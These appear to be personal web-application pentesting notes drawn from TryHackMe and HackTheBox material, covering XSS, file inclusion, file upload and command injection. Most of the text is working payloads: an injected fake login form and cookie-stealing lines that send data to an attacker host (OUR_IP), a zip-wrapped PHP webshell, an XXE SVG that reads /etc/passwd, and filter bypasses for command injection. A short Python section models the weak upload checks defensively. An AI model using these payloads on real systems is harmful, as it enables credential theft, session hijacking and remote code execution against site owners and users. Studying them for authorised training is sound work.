XSS
login form
document.write('<h3>Please login to continue</h3><form action="http://OUR_IP"><input type="text" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
This writes a fake login form straight into the DOM for phishing; the credentials are posted to OUR_IP.
The original login form can be removed directly through the DOM (ID_OF_ORIGINAL_FORM is a placeholder for the real element id):
document.getElementById('ID_OF_ORIGINAL_FORM').remove()
remote JS loading
<script src="http://OUR_IP/script.js"></script>
session hijacking
From the THM material we know that HTTP requests made with fetch() or an iframe may be blocked by the browser's security policy, so instead we can use the src of an img tag to send the request: image requests are treated as legitimate and are not blocked by the browser.
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
LFI
PHP Wrappers
The data wrapper can be used to include external data, including PHP code. However, including through data:// (and php://input) only works if the allow_url_include setting is enabled in the PHP configuration.
- php://filter
- data://text/plain,
- php://input
RFI
You can try protocols such as http and ftp. If the target is Windows, you can also use a UNC path, which Windows resolves over SMB and then over HTTP (WebDAV).
File upload combined with file inclusion
The usual approach: upload an image with PHP code embedded in it (an "image webshell"), then include that file through the file inclusion to get RCE.
You can also upload a zip archive and use the zip:// wrapper to read the PHP file inside it, which again gives RCE:
M1n9K1n9@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
?file=zip://./uploads/shell.jpg%23shell.php&cmd=id
PHPSession
- /var/lib/php/sessions/sess_xxxxxxxx
- C:\Windows\Temp\
PHP session files store user-related data; if we can control what is written into the session file (for example through a parameter that is saved in the session) and then include it, we get RCE.
Server logs and configuration files
The material lists common service log and configuration file paths for Linux and Windows,
and burp-parameter-names.txt from SecLists can be used to find parameters that may be vulnerable to file inclusion.
File Upload
List of common suffixes
web-extensions.txt in SecLists
whitelist bypass
When encountering an unsafe whitelist restriction such as this one:
<?php
// Vulnerable whitelist from the notes: the pattern has no $ anchor, so any
// name that contains an image extension anywhere in it passes the check.
$fileName = basename($_FILES["uploadFile"]["name"]);
if (!preg_match('/^.*\.(jpg|jpeg|png|gif)/', $fileName)) {
    echo "Only images are allowed";
    die();
}
You can try a double extension (.jpg.php), which passes the check because the pattern is not anchored to the end of the name.
reverse double extension
<FilesMatch ".+\.ph(ar|p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
This is how the web server (Apache) decides which files are handed to the PHP handler for execution.
Because the FilesMatch pattern is not anchored to the end of the filename either, any name that contains ".php", ".phar" or ".phtml" after a dot is matched and executed by PHP, so we can try a reverse double extension:
.php.jpg
A name such as shell.php.jpg passes an image whitelist and is still matched by this rule, so it is executed as PHP.
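To see how the two unanchored patterns above (the upload whitelist and the Apache FilesMatch rule) combine, here is an added Python model of both checks, not code from the notes: re.search mirrors the search semantics of PHP's preg_match() and Apache's FilesMatch, and the STRICT_WHITELIST pattern is my assumed hardened version.

```python
import re

# Patterns copied from the notes above. PHP's preg_match() and Apache's
# FilesMatch both use *search* semantics, which re.search mirrors here.
WEAK_WHITELIST = re.compile(r'^.*\.(jpg|jpeg|png|gif)')   # no $ anchor
PHP_HANDLER = re.compile(r'.+\.ph(ar|p|tml)')             # from FilesMatch

# Hardened check (my assumption, not from the notes): exactly one extension,
# anchored at both ends, no dots or path separators in the base name.
# Defence in depth still applies: store uploads outside the web root and
# give them a server-generated name rather than trusting this regex alone.
STRICT_WHITELIST = re.compile(r'^[^./\\]+\.(jpg|jpeg|png|gif)$')


def weak_upload_accepts(name: str) -> bool:
    return WEAK_WHITELIST.search(name) is not None


def strict_upload_accepts(name: str) -> bool:
    return STRICT_WHITELIST.search(name) is not None


def apache_runs_as_php(name: str) -> bool:
    return PHP_HANDLER.search(name) is not None


def assess(name: str, strict: bool = False) -> dict:
    """Would the upload be stored, and if so would Apache execute it as PHP?"""
    accepts = strict_upload_accepts if strict else weak_upload_accepts
    stored = accepts(name)
    return {"stored": stored, "executed": stored and apache_runs_as_php(name)}


if __name__ == "__main__":
    # Constructed sample names: a benign image, a double extension,
    # a reverse double extension and a plain .php file.
    for name in ("photo.jpg", "shell.jpg.php", "shell.php.jpg", "shell.php"):
        print(f"{name:14} weak={assess(name)}  strict={assess(name, strict=True)}")
```

With the weak whitelist both shell.jpg.php and shell.php.jpg are stored and executed; the anchored pattern rejects both while still accepting photo.jpg.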
Content-Type / MIME Type
XSS via file upload
Insert JavaScript into an image file and upload it with Content-Type: text/html; if the server serves it back with that type, it may cause XSS.
XXE via file upload
XXE by uploading a malicious SVG image:
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg>&xxe;</svg>
command injection
${IFS} (the internal field separator, which expands to whitespace and can replace a filtered space)
bash braces
- {ls,-la}
In bash, a command can be written in this form: brace expansion turns the comma-separated list into space-separated words. Only bash does this, sh does not.
${ENV_VAR} (environment variable expansion)
${VAR:offset:length} (substring expansion: take length characters starting at offset)
- ${PATH:0:1} -> /
- ${LS_COLORS:10:1} -> ;
Which characters can be obtained this way depends on the target's environment variables.
quotes bypass
In both Linux (bash) and PowerShell, a blacklisted command name can be broken up with single or double quotes:
whoam'i'
whoam"i"
Under Windows cmd only double quotes work.
$@ / ^
In bash, $@ expands to the positional parameters, which is nothing in this context, so it can be inserted into a command name without effect; in cmd the ^ escape character is likewise ignored.
reverse bypass
$(rev<<<'di')
iex "$('imaohw'[-1..-6] -join '')"
If the pipe character | is filtered, a here-string (<<<) can be used to feed input to rev instead of a pipe.